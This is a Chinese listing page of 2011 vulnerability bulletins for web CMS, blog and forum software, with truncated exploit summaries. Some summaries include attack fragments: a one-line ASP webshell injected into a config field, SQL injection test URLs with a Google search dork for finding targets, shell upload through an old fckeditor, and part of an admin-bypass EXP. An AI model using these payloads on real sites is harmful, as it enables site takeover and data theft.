当前位置:主页 > 文章中心 > 漏洞播报 >
  • 日期:2011-05-07 04:34:24
    [漏洞播报] phpcms2008密码暴力破解

    • 内容简介:来源:Dis9 Team users==chowner 说明下,这个确实比较蛋疼没啥意义,是在我之前检测一个站的时候发现是phpcms2008的,看了下加密方式,随便就弄了个试了下,发现代码版块帖子太少了实在不忍心干脆发来凑个数,admin别ban我ID啊,呵呵。 phpcms2008的加密方...

  • 日期:2011-05-07 04:32:51
    [漏洞播报] 深喉咙企业网站管理系统ASP版拿shell

    • 内容简介:查看版本 http://www.520jsj.com/SHLCMS 说明文档.htm 在系统配置(上面)的公司中文名称里插入%%eval request(a)%%s= 之后连接/Config/config.asp,密码 a OK~...

  • 日期:2011-05-07 04:31:57
    [漏洞播报] MyBlog存在任意文件上传漏洞

    • 内容简介:发布作者:BNE MyBlog是一个J2ee的开源自建blog系统,攻击者通过他的一些组件问题,可以上传任意文件。 由于使用了早期版本的fckeditor。导致可以通过文件名截断,绕过后缀名验证,上传任意文件。 提交如下http包,即可上传shell http://www.520jsj.com/uplo...

  • 日期:2011-05-07 04:28:03
    [漏洞播报] GeIT管理系统SQL盲注漏洞(可以批量拿webshell)

    • 内容简介:GeIT管理系统SQL盲注漏洞。出问题的文件index.asp 类型:sql盲注,注入。 测试: http://www.xxxx.com/index.asp?CID=27+and+1=1 http://www.520jsj.com/index.asp?CID=27+and+1=2 http://www.xxxx.com/index.asp?CID=[SQLI ] 谷歌关键词:intext:powered by...

  • 日期:2011-05-04 03:03:27
    [漏洞播报] BeeSns微博V0.2 0day

    • 内容简介:BeeSns微博V0.2 0day 文档分类: 脚本攻防/web apps 发表时间:2011-4-27 10:56:18 漏洞添加:子仪|关注度[120] 站内搜索:BeeSns微博V0.2 0day [BeeSns微博V0.2 0day 全文] 发布作者:子仪 影响版本:BeeSns V0.2 官方地址: http://www.beesns.com/ 漏洞类...

  • 日期:2011-05-04 03:00:12
    [漏洞播报] DedeCms 5.7 两处 XSS(最新0day)

    • 内容简介:/-----------------------------\ | DedeCms 5.7 build 20110325 | | XSS Vulnerability - G4by | | G4by94[at]gmail.com | \-----------------------------/ /______________No.1_评论__________________ |Code: | iframe src=http://google.com/ |At: |htt...

  • 日期:2011-05-04 02:56:43
    [漏洞播报] Parnian Opendata SQL注入漏洞及修复

    • 内容简介:Parnian Opendata是一款使用PHP开发的内容管理系统,Parnian Opendata中的index.php文件存在SQL注入漏洞,可能导致敏感信息泄露。 [+]info: ~~~~~~~~~ Exploit Title : Parnian Opendata CMS SQL Injection Vulnerability Date : 2011-04-15 Author : *Alexa...

  • 日期:2011-05-04 02:55:02
    [漏洞播报] EasyTalk 微博系统 X1.X 文件包含漏洞及修复

    • 内容简介:EasyTalk 微博系统 X1.X 文件包含漏洞,PluginsAction.class.php 文件中的参数 $_GET[out] 没有进行任何过滤,直接拿去调用包含文件,导致漏洞产生。 PluginsAction.class.php: -------------------------------------------------- class PluginsAction ex...

  • 日期:2011-05-02 04:01:51
    [漏洞播报] JspRun!论坛管理后台注入漏洞

    • 内容简介:漏洞说明:JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。 漏洞分析:在处理后台提交的文件中ForumManageAction.java第1940行 String export = request.getParameter(export);//直接获取,没有...

  • 日期:2011-05-02 03:59:52
    [漏洞播报] Discuz!NT 2.*-3.5.2 SQL注入漏洞0day

    • 内容简介:漏洞说明:Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。ajaxtopicinfo.ascx用户控件 poster SQL注入漏洞。结合ajax.aspx调用任意用户控件漏洞 漏洞文件:admin/UserControls/ ajaxtopicinfo.ascx 文件代码:由于posterl...

  • 日期:2011-04-28 10:29:39
    [漏洞播报] DiscuzX1.5 门户管理权限SQL注入Bug

    • 内容简介:Discuz!X是康盛创想(Comsenz)推出的一个以社区为基础的专业建站平台,让论坛(BBS)、个人空间(SNS)、门户(Portal)、群组(Group)、应用开放平台(Open Platform)充分融合于一体,帮助网站实现一站式服务。 source\include\portalcp\portalcp_articl...

  • 日期:2011-04-28 10:27:48
    [漏洞播报] Siteserver CMS 最新批量拿站 0DAY

    • 内容简介:SiteServer CMS 网站内容管理系统(著作权登记号2008SR15710)是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 SiteServer CMS 是基于微软.NET 平台开发的网站内容...

  • 日期:2011-04-28 10:25:31
    [漏洞播报] 千米旅游网站管理系统3.0 多处弱智漏洞及修复

    • 内容简介:by:Mr.DzY 千米旅游网站管理系统是最新开发的一套旅游行业网站管理系统,有效的帮助您搭建旅游电子商务网站。系统包含了文章发布模块、酒店模块、机票模块、旅游度假模块、景点模块、图片模块、旅游商城模块、会员模块、预订及订单处理模块、信息采集等功能...

  • 日期:2011-04-28 10:23:14
    [漏洞播报] ESPCMS v5.0 绕过管理员登陆EXP

    • 内容简介:发布作者:子仪 漏洞类型:cookies欺骗 漏洞分析:后台页面存在cookies验证漏洞,可欺骗进入后台。 EXP: ? function eccode($string, $operation=DECODE, $key=@LFK24s224%@safS3s%1f% ) { $result = ; if ($operation == ENCODE) { for ($i = 0; $i strlen(...

  • 日期:2011-04-28 10:20:06
    [漏洞播报] BeeSns微博系统V0.2提升权限0day and exp

    • 内容简介:发布作者:子仪 影响版本:BeeSns V0.2 官方地址: http://www.beesns.com/ 漏洞类型:权限提升 漏洞分析:IP过滤不严,导致用户可以提交恶意参数提升自身权限。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧 // 获取客户端IP...